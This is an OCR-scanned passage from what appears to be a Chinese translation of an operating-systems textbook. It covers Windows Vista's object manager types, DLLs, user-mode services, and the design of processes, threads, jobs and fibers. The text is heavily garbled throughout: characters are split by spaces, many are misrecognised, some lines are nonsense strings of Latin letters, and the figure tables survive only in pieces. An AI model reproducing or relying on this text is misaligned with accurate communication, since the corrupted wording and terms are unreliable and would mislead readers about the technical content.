NTFS。 因 此 ， 了 驱动 对 象 包含 NTFS 内 创建 操作 的 地 址 范围 。 


8)NTFS 将 填补 该 文件 中 的 对 象 并 将 它 返 回 到 IO 管理 器 ，LIO 管 理 
句 备 份 堆栈 中 的 所 有 设备 ， 直 到 lopParseDevice 返 回 对 象 管理 器 (如 
11.8 节 所 述 ) 。 


9) 在 对 象 管理 器 以 其 名 字 空 间 中 的 查找 结束 。 它 从 Parse 程 序 收 到 
一 个 初始 化 对 象 《这 正好 是 一 个 文件 对 象 ， 而 不 是 原来 对 象 发 现 的 设 
备 对 象 ) 。 因 此 ， 对 象 管理 器 为 文件 对 象 在 目前 进程 的 句柄 表 里 创建 
了 一 个 句柄 ， 并 对 需求 者 返回 句柄 。 


10): a RAPA, et OI Be Win32 API 
CreateFile， 它 会 把 句柄 返回 给 应 用 程序 。 


可 执行 组 件 能 够 通过 调用 ObCreateObjectType 接 口 给 对 象 管理 器 来 
动态 创建 新 的 类 型 。 由 于 每 次 发 布 都 在 变化 ， 所 以 没有 一 个 限定 的 对 
象 类 型 定义 表 。 图 11-23 列 出 了 在 Windows Vista 中 非常 通用 的 一 些 对 象 
类 型 ， 供 快速 参考 。 
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具有 持久 状态 〈 已 标记 信和 号 \ 未 标记 信号 ) 的 同步 对 象 

内 部 进程 消息 传递 的 机 制 

允许 一 个 线程 固定 时 间 间 隔 休眠 的 对 象 

| Queve | 用 来 完成 异步 WO 通知 的 对 象 
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注册 表 关 键 字 ， 用 于 把 注册 信息 关联 到 某 个 对 象 管理 名 字 空 间 
对 象 管理 器 中 一 组 对 象 的 目录 

通过 路 径 名 引用 到 另 一 个 对 象 管理 器 对 象 

物理 设备 、 总 线 、 驱 动 或 者 卷 实例 的 MO 设备 对 象 

每 一 个 加 载 的 设备 驱动 都 有 它 自己 的 一 个 对 象 


图 11-23 ”对象 管理 器 管理 的 一 些 通 用 可 执行 对 象 类 型 


进程 (process) 和 线程 (thread) 是 明显 的 。 每 个 进程 和 每 个 线程 
都 有 一 个 对 象 来 表示 ， 这 个 对 象 包含 了 管理 进程 或 线程 所 需 的 主要 属 
性 。 接 下 来 的 三 个 对 象 : 信号 量 、 互 不 体 和 事件 ， 都 可 以 处 理 进程 间 


WE o fe A SR ATR ALE, (Le Ben ES 
哨 (例如 ， 最 大 值 和 超时 设 定 ) 。 事 件 可 以 在 两 种 状态 之 一 : 已 标记 
信号 或 未 标记 信号 。 如 采 一 个 线程 等 竺 事件 处 于 已 标记 信和 号 状态 ， 线 
程 被 立即 释放 。 如 果 该 事件 是 未 标记 信号 状态 ， 它 会 一 直 阻 塞 直到 一 
些 其 他 线程 信号 释放 所 有 被 阻止 的 线程 (通知 事件 ) 的 活动 或 只 是 第 
一 个 被 阻止 的 线程 (同步 事件 ) 。 也 可 以 设置 一 个 事件 ， 这 样 一 种 信 
号 成 功 等 待 后 ， 它 会 目 动 恢 复 到 该 未 标记 信号 的 状态 而 不 是 处 在 已 标 


记 信和 号 状态 。 


端口 、 定 时 器 和 队列 对 象 也 与 通信 和 同步 相关 。 端 口 是 进 程 之 间 
交换 LPC 消 恩 的 通道 。 定 时 融 提 供 一 种 为 特定 的 时 间 区 间 内 阻塞 的 方 
法 。 队 列 用 于 通知 线程 已 完成 以 前 局 动 的 异步 IO 操作 ， 或 一 个 端口 有 
消息 等 等。 (它们 被 设计 来 管理 应 用 程序 中 的 并 发 的 水 平 ， 以 及 在 使 
用 高 性 能 多 处 理 器 应 用 中 使 用 ， 如 SQL) 。 


当 一 个 文件 被 打开 时 ，Open file 对 象 将 会 被 创建 。 没 打开 的 文件 ， 
并 没有 对 象 由 对 象 管理 器 管理 。 访 问 令 牌 是 安全 的 对 象 。 它 们 识别 用 
户 ， 并 指出 用 户 具 有 什么 样 的 特权 ， 如 果 有 的 话 。 配 置 文件 是 线程 的 
用 于 存储 程序 计数 器 的 正在 运行 的 周期 样本 的 数据 结构 ， 用 以 确定 程 
序 线程 的 时 间 是 花 在 哪些 地 方 了 。 


段 用 来 表示 内 存 对 象 ， 这 些 内 存 对 象 可 以 被 应 用 程序 向 内 存 管理 
右 请 求 ， 将 应 用 程序 的 地 址 空间 映射 到 这 个 区 域 中 来 。 它 们 记 杂 表示 


磁盘 上 的 内 存 对 象 的 页 的 文件 (或 页 面 文件 ) 的 段 。 键 表示 的 是 象 管 
理 名 字 空 间 的 注册 表 名 字 空 间 的 加 载 点 。 通 常 只 有 一 个 名 为 
\REGISTRY 关 键 对 象 ， 负 责 链接 到 注册 表 刍 值 科 NT 名 字 空 间 的 值 。 


对 象 目录 和 符号 链接 完全 是 本 地 对 象 管理 器 的 NT 名 字 空 间 的 一 部 
分 。 它 们 是 类 似 于 和 它们 对 应 的 文件 系统 部 分 : 目 孙 允许 要 收集 一 些 
相关 的 对 象 。 符 号 链接 允许 对 象 名 字 空 间 来 引用 一 个 对 象 名 字 空 间 的 
不 同 部 分 中 的 对 象 的 一 部 分 的 名 称 。 


每 个 已 知 的 操作 系统 的 设备 有 一 个 或 多 个 设备 对 象 包含 有 关 它 的 
言 息 ， 并 且 由 系统 引用 该 设备 。 最 后 ， 每 个 已 加 载 设备 驱动 程序 在 对 
象 空间 中 有 一 个 驱动 程序 对 象 。 了 驱动 程序 对 象 被 所 有 那些 表示 被 这 些 
驱动 控制 的 设备 的 实例 共享 。 


其 他 没有 介绍 的 对 象 有 更 多 特别 的 目的 ， 如 同 内 核 事务 的 交互 或 
Win32 线 程 池 的 工作 线程 工厂 交互 。 


11.3.4 子 系 统 、DLL 和 用 户 态 服务 


回 到 图 11-6， 我 们 可 以 看 到 Windows Vista 操 作 系 统 是 由 内 核 态 中 
的 组 件 和 用 户 态 的 组 件 组 成 的 。 现 在 我 们 已 经 介绍 完了 我 们 的 内 核 态 
组 件 ， 因 此 ， 我 们 接 下 来 看 看 用 户 态 组 件 。 其 中 对 于 Windows 有 三 种 
组 件 尤为 重要 : 环境 子 系 统 、DLL 和 服务 进程 。 


我 们 已 介绍 Windows 子 系统 模型 ， 所 以 这 里 不 作 更 多 详细 介绍 ， 
而 主要 是 关注 原始 设计 的 NT， 子 系统 被 视 为 一 种 利用 内 核 态 运行 相同 
底层 软件 来 支持 多 个 操作 系统 个 性 化 的 方法 。 也 许 这 是 试图 避免 操作 
系统 竞争 相同 的 平台 ， 例 如 在 DEC 的 VAX 上 的 VMS 和 Berkeley 
UNIX。 或 者 也 许 在 微软 没有 人 知道 OS/2 是 否 会 成 为 一 个 成 功 的 编程 
接口 ， 他 们 加 上 了 他 们 的 投注 。 结 果 ，OS/2 成 为 无 关 的 后 来 者 ， 而 
Win32 API 设 计 为 与 Windows 95 结 合并 成 为 主导 。 


Windows 用 户 态 设计 的 第 二 个 重要 方面 是 在 动态 链接 库 
(DLL) ， 即 代码 是 在 程序 运行 的 时 候 完 成 的 链接 ， 而 非 编译 时 。 共 
享 的 库 不 是 一 个 新 的 概念 ， 最 现代 化 的 操作 系统 使 用 它们 。 在 
Windows 中 几乎 所 有 库 都 是 DLL， 从 每 一 个 进程 都 装载 的 系统 库 
ntdll.d1 到 旨 在 允许 应 用 程序 开发 人 员 进 行 代码 通用 的 功用 函数 的 高 层 
程序 库 。 


DLL 通 过 允许 在 进程 之 间 共 至 通 用 代码 来 提高 系统 效率 ， 你 持 第 
用 代码 在 内 存 中 ， 处 理 减 少 从 程序 磁盘 到 内 存 中 的 加 载 时 间 。 并 人 允许 
操作 系统 的 库 代 码 进行 更 新 时 无 需 重 狐 编 译 或 重新 链接 所 有 使 用 它 的 
应 用 程序 ， 从 而 提高 系统 的 使 用 能 


此 外 ， 共 享 的 库 介 绍 版 本 控制 的 问题 ， 并 增加 系统 的 复杂 性 ， 因 
为 为 帮助 某 些 特定 的 应 用 而 引入 的 更 改 可 能 会 给 其 他 的 一 些 特定 的 应 
用 带 来 可 能 的 错误 ， 或 者 因为 实现 的 改变 而 破坏 了 一 些 其 他 的 应 用 
一 一 这 是 一 个 在 Windows 世 界 称 为 DLL 黑洞 的 问题 。 


DLL 的 实现 在 概念 上 是 简单 的 。 并 非 直接 调用 相同 的 可 执行 映像 
中 的 子 例 程 的 代码 ， 一 定 程度 的 间接 性 引用 被 编译 器 引入 : IAT ( 导 
入 地 址 表 ) 。 当 可 执行 文件 被 加 载 时 ， 它 查找 也 必须 加 载 的 DLL 的 列 
# (这 将 是 一 个 图 结构 ， 因 为 这 些 DLL 本 身 会 指定 它们 所 需要 的 其 他 
的 DLL 列 表 ) 。 所 需 的 DLL 被 加 载 并 且 填 写 好 它们 的 IAT。 


现实 是 更 复杂 的 。 另 一 个 问题 是 代表 DLL 之 间 的 关系 图 可 以 包含 
环 ， 或 具有 不 确定 性 行为 ， 因 此 计算 要 加 载 的 DLL 列表 可 以 导致 不 能 
运行 的 结果 。 此 外 ， 在 Windows 中 DLL 代码 库 有 机 会 来 运行 代码 ， 只 
要 它们 加 载 到 了 进程 中 或 者 创建 一 个 新 线程 。 通 常 ， 这 是 使 它们 可 以 
执行 初始 化 ， 或 为 每 个 线程 分 配 存 储 空 间 ， 但 许多 DLL 在 这 些 附 加 例 
程 中 执行 大 量 的 计算 。 如 果 任 何 范 数 调用 的 一 个 附加 例 程 需要 检查 加 
载 的 DLL 列表 ， 死 锁 可 能 会 发 生 在 这 个 过 程 。 


DLL 用 于 不 仅仅 共享 常见 的 代码 。 它 们 还 可 以 启用 一 种 宿主 的 扩 
展 应 用 程序 模型 。Internet Explorer 可 以 下 载 并 链接 到 DLL 调 用 ActiveX 
控件 。 另 一 端 互 联网 的 web 服务 器 也 加 载 动 态 代 码 ， 以 为 它们 所 显示 
的 网 页 产生 更 好 的 web 体验 。 像 Microsoft Office 的 应 用 程序 允许 链接 
并 运行 DLL， 使 得 Office 可 以 类 似 一 个 平台 来 构建 新 的 应 用 程序 。 
COM (组 件 对 象 模型 ) 编程 模式 允许 程序 动态 地 查找 和 加 载 编写 来 提 
供 特 定 发 布 接口 的 代码 ， 这 就 导致 几 乎 所 有 使 用 COM 的 应 用 程序 都 以 
in-process 的 方式 来 托管 DLL 。 


所 有 这 类 动态 加 载 的 代码 ， 为 操作 系统 造成 了 更 大 的 复杂 性 ， 因 
为 程序 库 的 版 本 管理 不 是 只 为 可 执行 体 匹配 对 应 版 本 的 DLL， 而 是 有 
时 把 多 个 版 本 的 同一 个 DLL 加 载 到 进程 中 一 Microsoft 称 之 为 肩 并 肩 
(side-by-side) 。 单 个 的 程序 可 以 承载 两 个 不 同 的 DLL， 每 个 可 能 
加 载 同一 个 Windows 库 一 一 但 对 该 库 的 版 本 有 不 同 要 求 。 


较 好 的 解决 方案 是 把 代码 放 到 独立 的 进程 里 。 而 在 进程 外 承载 的 
代码 结 末 具有 较 低 的 性 能 ， 并 在 很 多 情况 下 会 市 来 一 个 更 复杂 的 编程 
模型 。 微 软 尚 未 提供 在 用 户 仿 下 来 处 理 这 种 复杂 度 的 一 个 好 的 解决 办 
法 。 但 这 让 人 对 相对 简单 的 内 核 态 产生 了 希望 。 


该 内 核 态 具有 较 少 的 复 洒 性 ， 是 因为 它 相 对 于 用 户 态 提供 了 更 少 
的 对 外 部 设备 驱动 模型 的 支持 。 在 Windows 中 ,系统 功能 的 扩展 是 通过 
编写 用 户 态 服务 来 实现 的 。 这 对 于 子 系统 运行 得 很 好 ， 并 且 在 只 有 很 


少 更 新 的 时 候 ， 而 不 古 整 个 系统 的 个 性 化 的 情况 下 ， 能 够 取得 更 好 的 
性 能 。 在 内 核实 现 的 服务 和 在 用 户 态 进程 实现 的 服务 之 间 只 有 很 少 的 
功能 性 差异 。 内 核 和 过 程 都 提供 了 专用 地 址 空间 ， 可 以 保护 数据 结构 
和 服务 请 求 可 以 被 审议 。 


但 是 ， 可 能 会 与 服务 的 用 户 态 处 理 内 核 中 服务 有 重大 的 性 能 差 
异 。 通 过 现代 的 硬件 从 用 户 态 进入 内 核 是 很 慢 的 ， 但 是 也 比 不 上 要 来 
回 切换 两 次 的 更 慢 ， 因 为 还 需要 从 内 存 切 换 出 来 进入 另 一 个 进程 。 而 
且 器 进程 通信 于 宽 较 低 。 


内 核 态 代码 (非常 仔细 地 ) 可 以 把 用 户 态 处 理 的 数据 作为 参数 传 
递 给 其 系统 调用 的 方式 来 访问 数据 。 通 过 用 户 态 的 服务 ， 数 据 必须 被 
复制 到 服务 进程 或 由 映射 内 存 等 提供 的 一 些 机 制 (Windows Vista 中 的 
ALPC 功 能 在 后 台 人 处理) o 


将 来 路 地 址 至 间 的 切换 代价 很 可 能 会 越 来 越 小 ， 保 护 模式 将 会 减 
>， 或 甚至 成 为 不 相关 。 在 Singularity 中 ， 微 软 研究 院 (Fandrich 等 
人 ，2006 年 ) 使 用 运行 时 技术 ， 类 似 C# 和 Java， 用 来 做 一 个 完全 软件 
问题 的 保护 。 这 殊 要 求 地 址 空间 的 切换 或 保护 模式 下 没有 硬件 的 切换 
AS 


Re 


Windows Vista 利 用 用 户 态 的 服务 进程 极 大 地 提升 了 系统 的 性 能 。 
其 中 一 些 服务 是 同 内 核 的 组 件 紧 密 相关 的 ， 例 如 ]sass.exe 这 个 本 地 安全 


吴 份 验证 服务 ， 它 管理 了 表示 用 户 身 份 的 令 牌 (token) 对 象 ， 以 及 文 
件 系统 用 来 加 密 的 密 钥 。 用 户 态 的 即 插 即 用 管理 器 负责 确定 要 使 用 新 
的 硬件 设备 所 需要 的 正确 的 驱动 程序 来 安装 它 ， 并 告诉 内 核 加 载 它 。 
系统 的 很 多 功能 是 由 第 三 方 提供 的 ， 如 防 病毒 程序 和 数字 版 权 管 理 ， 
这 些 功 能 部 是 作为 内 核 态 驱 动 程序 和 用 户 态 服务 的 组 合 方式 实现 的 。 


在 Windows Vista 中 taskmgrexe 有 一 个 选项 卡 ， 标 识 在 系统 上 运行 
的 服务 。 (早期 版 本 的 Windows 将 显示 服务 使 用 net start 命 令 的 列 
表 ) 。 很 多 服务 是 运行 在 同一 进程 (svchost.exe) 中 的 。Windows 也 利 
用 这 种 方式 来 处 理 目 己 启动 时 间 的 服务 ， 以 减少 局 动 系统 所 需 的 时 
间 。 服 务 可 以 合并 到 相同 的 进程 ， 只 要 它们 能 安全 地 使 用 相同 的 安全 
凭据。 


在 每 个 共 至 的 服务 进程 内 ， 个 体 服 务 是 以 DLL 的 形式 加 载 的 。 它 
们 通常 利用 Win32 的 线程 池 的 功能 来 共 圣 一 个 进程 池 ， 这 样 对 于 所 有 
的 服务 ， 只 需要 运行 最 小 数目 的 线程 。 


服务 是 系统 中 常见 的 安全 漏洞 的 来 源 ， 因 为 它们 是 经 常 是 可 以 远 
程 访问 的 (取决 于 TCP/IP 防 火 墙 和 IP 安 全 设置 ) ， 且 不 是 所 有 程序 员 
都 是 足够 仔细 的 ， 他 们 很 可 能 没有 验证 通过 RPC 传 递 的 参数 和 缓冲 
区 。 


11.4 Windows Vista 中 的 进程 和 线程 


Windows 具 有 大 量 的 管理 CPU 和 资源 分 组 的 概念 。 以 下 各 节 中 ,我 
们 将 检查 这 些 有 关 的 Win32 API 调 用 的 讨论 ， 并 介绍 它们 是 如 何 实现 
的 。 


11.4.1 基本 概念 


在 Windows Vista 中 的 进程 是 程序 的 容器 。 它 们 持 有 的 虚拟 地 址 空 
间 ， 以 及 指向 内 核 态 的 对 象 的 线程 的 句柄 。 作 为 线程 的 容器 ， 它 们 提 
供 线 程 执 行 所 需要 的 公共 资源 ， 例 如 配额 结构 的 指针 、 共 至 的 令 牌 对 
象 以 及 用 来 初始 化 线程 的 默认 参数 一 一 包括 优先 次 序 和 调度 类 。 每 个 
进程 都 有 用 户 态 系统 数据 ， 称 为 PEB (进程 环境 块 ; 。PEB 包 括 已 加 载 
的 模块 (如 EXE 和 DLL) 列表 ， 包 含 环 境 字符 串 的 内 存 、 当 前 的 工作 
目录 和 管理 进程 堆 的 数据 一 一 以 及 很 多 随 着 时 间 的 推移 已 添加 的 Win32 


cruft ° 


线程 是 在 windows 中 调度 CPU 的 内 核 抽 和 象 。 优 和 级 是 基于 进程 中 包 
含 的 优先 级 值 来 为 每 个 线程 分 配 的 。 线 程 也 可 以 通过 杀 和 处 理 只 在 菏 
些 处 理 器 上 运行 。 这 有 助 于 显 式 分 发 多 处 理 器 上 运行 的 并 发 程序 的 工 
作 。 每 个 线程 都 有 两 个 单独 调用 堆栈 ， 一 个 在 用 户 态 执行 ， 男 一 个 内 


核 态 执行 。 也 有 TEB (线程 环境 块 ; 使 用 户 态 数据 指定 到 线程 ， 包 括 
每 个 线程 存储 区 (线程 本 地 存储 区 ) 和 Win32 字 段 、 语 言 和 文化 本 地 化 
以 及 其 他 专门 的 字段 ， 这 些 字段 者 被 各 种 不 同 的 功能 添加 上 了 。 


除了 PEB 与 TEB 外 ， 还 有 为 一 个 数据 结构 ， 内 核 态 与 每 个 进程 共享 
的 ， 即 用 户 共享 数据 。 这 个 是 可 以 由 内 核 写 的 页 ， 但 是 每 个 用 户 态 进 
程 只 能 读 。 它 包含 了 一 系列 的 由 内 核 维护 的 值 ， 如 各 种 时 间 、 版 本 信 
轧 、 物 理 内 存 和 大 量 的 被 用 户 态 组 件 共 享 的 标志 ， 如 COM、 终端 服务 
和 调试 程序 。 有关 使 用 此 只 读 的 共享 页 ， 纯 粹 是 出 于 性 能 优化 的 目 
的 ， 因 为 值 也 能 获得 通过 系统 调用 到 内 核 仿 获得 。 但 系统 调用 是 比 一 
个 内 存 访问 代价 大 很 多 ， 所 以 对 于 大 量 由 系统 维护 的 字段 ， 例 如 时 
间 ， 这 样 的 处 理 就 很 有 意义 。 其 他 字段 ， 如 当前 时 区 更 改 很 少 ， 但 依 
赖 于 这 些 字 段 的 代码 必须 查询 它们 往往 只 是 看 它们 是 否 已 更 改 。 


1. 进 程 


进程 创建 是 从 段 对 象 创建 的 ， 每 个 段 对 象 描述 了 磁盘 上 某 个 文件 
的 一 个 内 存 对 象 。 在 创建 一 个 过 程 时 创建 的 进程 将 接收 一 个 句柄 ， 这 
个 句柄 允许 它 通过 映射 段 、 分 配 虚 拟 内 存 、 写 参数 和 环境 变量 数据 、 
复制 文件 描述 符 到 它 的 句柄 表 、 创 建 线程 来 修改 新 的 进程 。 这 非常 不 
同 于 在 UNIX 中 创建 进程 的 ， 反 映 了 Windows 与 UNIX 初 始 设计 目标 系统 
的 不 同 。 


正如 11.1 节 所 描述 ，UNIX 是 为 16 位 单 处 理 器 系统 设计 的 ， 而 这 样 
的 单 处 理 器 系统 是 用 于 在 进程 之 间 交 换 共 享 内 存 的 。 这 样 的 系统 
进程 作为 并 发 的 单元 ， 并 且 使 用 像 fork 这 样 的 操作 来 创建 进程 是 一 个 天 
才 般 的 设计 主意 。 如 果 要 在 很 小 的 内 存 中 运行 一 个 新 的 进程 ， 并 且 没 
有 硬件 支持 的 虚拟 内 存 ， 那 么 在 内 存 中 的 进程 就 不 得 不 换 出 到 磁盘 以 
创建 空间 。UNIX 操 作 系 统 (一 种 多 用 户 的 计算 机 操作 系统 ) 最 初 仅仅 
通过 简单 的 父 进程 交换 技术 和 传递 其 物理 内 存 给 它 的 子 进程 来 实现 
fork。 这 种 操作 和 运行 几乎 是 没有 代价 的 。 


相 比 之 下 ， 在 Cutler 小 组 开发 NT 的 时 代 ， 当 时 的 硬件 环境 是 32 位 多 
处 理 器 系统 与 虚拟 内 存 硬件 共享 1~16 浪 字 节 的 物理 内 存 。 多 处 理 器 为 
部 分 程序 并 行 运行 提供 了 可 能 ， 因 此 NT 使 用 进程 作为 共享 内 存 和 数据 
资源 的 容器 ， 并 使 用 线程 作为 并 发 调度 单元 。 


当然 ， 随 后 几 年 里 的 系统 束 完 全 不 同 于 这 些 环境 了 。 例 如 拥有 64 
位 地 址 空间 并 且 一 个 芯片 上 集成 十 几 个 (乃至 数 百 个 ) CPU 内 核 ， 存 
储 体系 结构 中 奉 干 GB 大 小 的 物理 内 存 以 及 内 存 设 备 和 其 他 非 易 失 存 储 
存 设 备 的 加 入 ， 更 广泛 虚拟 化 、 普 适 网 络 的 支持 ， 以 及 例如 事件 型 内 
存 (transactional memory) 这 类 同步 技术 的 创新 。Windows 和 UNIX 操 
作 系 统 无 疑 将 继续 适应 现实 中 新 的 人 硬件， 但 我 们 更 感 兴趣 的 是 ， 会 有 
哪些 新 的 操作 系统 会 基于 新 硬件 而 被 特别 设计 出 来 。 


2. 作 业 和 纤 程 


Windows 可 以 将 进程 分 组 为 作业 ， 但 作业 抽象 并 不 足够 通用 。 原 因 
征 其 专 为 限制 分 组 进程 所 包含 的 线程 而 设计 ， 如 通过 限制 共享 资源 配 
额 、 强 制 执行 受 限 令 牌 (restricted token) 来 阻止 线程 访问 许多 系统 对 
象 。 作 业 最 重要 的 特性 是 一 旦 一 个 进程 在 作业 中 ， 该 进程 创建 的 进 
程 、 线 程 也 在 该 作业 中 ， 没 有 特例 。 婚 像 它 的 名 字 所 示 ， 作 业 是 为 类 
似 批 处 理 环 境 而 非 交 互 式 计算 环境 而 设计 的 。 


一 个 进程 最 多 属于 一 个 作业 。 这 站 有 道理 的 ， 因 为 很 难 去 定义 一 
个 进程 必须 服从 多 个 共 吝 配额 或 限制 令 牌 的 情况 。 但 这 也 意味 着 ， 如 
果 有 多 个 系统 服务 莹 试 使 用 作业 来 管理 同一 部 分 进程 ， 则 会 产生 冲 
突 。 例 如 ， 如 果 进 程 首 先 将 自己 加 入 到 了 一 个 作业 中 ， 或 者 一 个 安全 
的 工具 已 经 将 其 加 入 了 带 有 一 定 受 限 令 牌 的 作业 中 ， 则 当 一 个 管理 工 
具 试 图 将 进程 加 入 其 他 作业 以 限制 其 资源 时 将 会 失败 。 因 此 在 Windows 
中 很 少 使 用 作业 。 


图 11-24 显 示 了 人 作业、 进程、 线程 和 纤 程 之 间 的 关系。 作业 包含 进 
程 ， 进 程 包含 线程 ， 但 是 线程 不 包 合 纤 程 。 线 程 与 纤 程 通常 古 多 对 多 
的 大 系 。 


图 11-24 作业、 进程、 线程 、 纤 程 之 间 的 天 系 。 作 业 和 纤 程 是 可 选 
的 ， 并 不 是 所 有 的 进程 都 在 作业 中 或 者 包含 纤 程 


纤 程 通过 分 配 栈 与 用 来 存储 纤 程 相 关 寄 存 器 和 数据 的 用 户 态 纤 程 
数据 结构 来 创建 。 线 程 被 转换 为 纤 程 ， 但 纤 程 也 可 以 独立 于 线程 创 
建 。 这 些 新 创建 的 纤 程 直到 一 个 已 经 运行 的 纤 程 显 式 地 调用 
SwitchToFiber 丽 数 才 开始 执行 。 由 于 线程 可 以 尝试 切换 到 一 个 已 经 在 
运行 的 纤 程 ， 因 此 ， 程 序 员 必 须 使 用 同步 机 制 以 防止 这 种 情况 发 生 。 


纤 程 的 主要 优点 在 于 纤 程 之 间 的 切换 开销 要 远 远 小 于 线程 之 间 的 
切换 。 线 程 切 换 需 要 进出 内 核 而 纤 程 切换 仅 需 要 保存 和 恢复 几 个 寄存 
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尽管 纤 程 是 协同 调度 的 ， 如 果 有 多 个 线程 调度 纤 程 ， 则 需要 非 稼 


小 心地 通过 同步 机 制 以 确保 纤 程 之 间 不 会 互相 干扰 。 为 了 简化 线程 和 
纤 程 之 间 的 交互 ， 通 党 创建 和 能 运行 它们 的 内 核 数 目 一 样 多 的 线程 ， 
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每 个 线程 可 以 运行 一 个 独立 的 纤 程 子 集 ， 从 而 建立 起 线程 和 纤 程 
之 间 一 对 多 的 关系 来 简化 同步 。 即 便 如 此 ， 使 用 纤 程 仍然 有 许多 困 
难 。 大 多 数 的 Win32 库 古 完 全 不 识别 纤 程 的 ， 并 且 壬 试 像 使 用 线程 一 样 
使 用 纤 程 的 应 用 会 遇 到 各 种 错误 。 由 于 内 核 不 识别 纤 程 ， 当 一 个 纤 程 
进入 内 核 时 ， 其 所 属 线程 可 能 阻塞 。 此 时 处 理 器 会 调度 任意 其 他 线 
程 ， 导 致 该 线程 的 其 他 纤 程 均 无 法 运行 。 因 此 纤 程 很 少 使 用 ， 除 非 从 
其 他 系统 移植 那些 明显 需要 纤 程 提供 功能 的 代码 。 图 11-25 总 结 了 上 面 
提 到 的 这 些 抽 象 。 


图 11-25 ”CPU 和 资源 管理 所 使 用 的 基本 概念 


3. 线 程 


通常 每 一 个 进程 是 由 一 个 线程 开始 的 ， 但 一 个 新 的 进程 也 可 以 动 
态 创 建 。 线 程 是 CPU 调度 的 基本 单位 ， 因 为 操作 系统 总 是 选择 一 个 线 


程 而 不 是 进程 来 运行 。 因 此 ， 每 一 个 线程 有 一 个 调度 状态 (就 绪 态 、 
运行 态 、 阻 塞 态 等 ) ， 而 进程 没有 调度 状态 。 线 程 可 以 通过 调用 指定 
了 在 其 所 属 进程 地 址 空间 中 的 开始 运行 地 址 的 Win32 库 函数 动态 创建 。 


每 一 个 线程 均 有 一 个 线程 D， 其 和 进程 ID 取 目 同一 空间 ， 因 此 单 
一 的 ID 不 可 能 同时 被 一 个 线程 和 一 个 进程 使 用 。 进 程 和 线程 的 ID 十 4 的 
倍数 ， 因 为 它们 实际 上 起 通 过 用 于 分 配 ID 的 特殊 句柄 表 来 执行 分 配 
的 。 该 系统 复 用 了 如 图 11-18 和 图 11-19 所 示 的 可 扩展 句柄 管理 功能 。 句 
柄 表 没 有 对 和 象 的 引用 ， 但 使 用 指针 指向 进程 或 线程 ， 使 通过 1D 查找 一 
个 进程 或 线程 非常 有 效 。 最 新 版 本 的 Windows 采 用 先进 先 出 顺序 管理 空 
闲 句 柄 列表 ， 使 ID 无 法 马上 重复 使 用 。ID 马 上 被 重复 使 用 的 问题 将 在 


本 章 的 最 后 问题 部 分 再 讨论 。 


线程 通常 在 用 户 态 运 行 ， 但 是 当 它 进行 一 个 系统 调用 时 ， 隋 切换 
到 内 核 态 ， 并 以 其 在 用 户 态 下 相同 的 属性 以 及 限制 继续 运行 。 每 个 线 
程 有 两 个 堆栈 ， 一 个 在 用 户 态 使 用 ， 而 为 一 个 在 内 核 态 使 用 。 任 何 时 
候 当 一 个 线程 进入 内 核 态 ， 其 切换 到 内 核 态 堆栈 。 用 尸 态 寄存 如 的 值 
以 上 下 文 (context) 数据 结构 的 形式 保存 在 该 内 核 态 堆栈 底部 。 因 为 
只 有 进入 内 核 态 的 用 户 态 线程 才 会 停止 运行 ， 当 它 没有 运行 时 该 上 下 
文 数据 结构 中 总 是 包括 了 其 寄存 着 状态 。 任 何 拥有 线程 句柄 的 进程 可 
以 查看 并 修改 这 个 上 下 文 数据 结构 。 
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服务 器 计算 的 情况 下 ， 一 个 服务 器 线程 可 能 需要 模拟 其 客户 端 ， 此 时 
需要 使 用 基于 客户 端 令 牌 的 临时 令 牌 标识 来 执行 客户 的 操作 。 (一 般 
来 说 服务 右 不 能 使 用 客户 只 的 实际 令 牌 ， 因 为 客户 端 和 服务 融 可 运行 
于 不 同 的 系统 。) 


IO 处 理 也 经 常 需要 关注 线程 。 当 执行 同步 JO 时 会 阻塞 线程 ， 并 且 
异步 WO 相关 的 未 完成 的 VO 请 求 也 关联 到 线程 。 当 一 个 线程 完成 执行 ， 
它 可 以 退出 ， 此 时 任何 等 得 该 线程 的 VO 请 求 将 被 取消 。 当 进程 中 最 后 
一 个 活跃 线程 退出 时 ， 这 一 进程 将 终止 。 


需要 注意 的 是 线程 是 一 个 调度 的 概念 ， 而 不 是 一 个 质 源 所 有 权 的 
概念 。 任 何 线程 可 以 访问 其 所 属 进程 的 所 有 对 象 ， 只 需要 使 用 句柄 
值 ， 并 进行 合适 的 Win32 调 用 。 一 个 线程 并 不 会 因为 一 个 不 同 的 线程 创 
建 或 打开 了 一 个 对 象 而 无 法 访问 它 。 系 统 甚至 没有 记录 是 哪 一 个 线程 
创建 了 哪 一 个 对 象 。 一 旦 一 个 对 象 句柄 已 经 在 进程 句柄 表 中 ， 任 何在 
这 一 进程 中 的 线程 均 可 使 用 它 ， 即 使 它 是 在 模拟 为 一 个 不 同 的 用 户 。 


正如 前 面 所 述 ， 除 了 用 户 态 运行 的 正音 线程 ，Windows 有 许多 只 能 


这 一 类 型 的 系统 线程 运行 在 一 个 特殊 的 称 为 系统 进程 的 进程 中 。 该 进 
程 没 有 用 户 态 地 址 空间 ， 其 提供 了 线程 在 不 代表 某 一 特定 用 户 态 进程 
执行 时 的 环境 。 当 学 到 内 存 管理 的 时 候 ， 我 们 将 讨论 这 样 的 一 些 线 


程 。 这 些 线程 有 的 执行 管理 任务 ， 例 如 写 脏 页 面 到 磁盘 上 ， 而 其 他 形 
成 了 工作 线程 池 ， 来 分 配 并 执行 部 件 或 驱动 程序 需要 系统 进程 执行 的 
工作 。 


11.4.2 作业、 进程 、 线 程 和 纤 程 管理 API 调 用 


新 的 进程 是 由 Win32 API 函 数 CreatProcess 创 建 的 。 这 个 函数 有 许多 
参数 和 大 量 的 选项 ， 包 括 被 执行 文件 的 名 称 ， 命 令 行 字 符 串 (未 解 
析 ) 和 一 个 指向 环境 字符 串 的 指针 。 其 中 也 包括 了 控制 诸多 细节 的 令 
牌 和 数值 ， 这 些 细节 包括 了 如 何 配置 进程 和 第 一 个 线程 的 安全 性 ， 调 
试 配置 和 调度 优先 级 等 。 其 中 一 个 令 牌 指定 创建 者 打开 的 句柄 是 否 被 
传递 到 新 的 进程 中 。 该 男 数 还 接受 当前 新 进程 的 工作 目录 和 可 选 的 带 
有 关于 此 进程 使 用 GUI 窗口 的 相关 信息 的 数据 结构 。Win32 对 新 进程 和 
其 原始 线程 都 返回 ID 和 句柄 ,而 非 只 为 新 进程 返回 一 个 ID 号 。 


大 量 的 参数 揭示 了 Windows 和 UNIX 在 进程 创建 的 开发 设计 上 的 诸 
多 的 不 同 之 处 。 


1) 寻 找 执行 程序 的 实际 搜索 路 径 隐 藏 在 Win32 的 库 代 码 里 ,但 
UNIX 中 则 显 式 地 管理 该 信息 。 

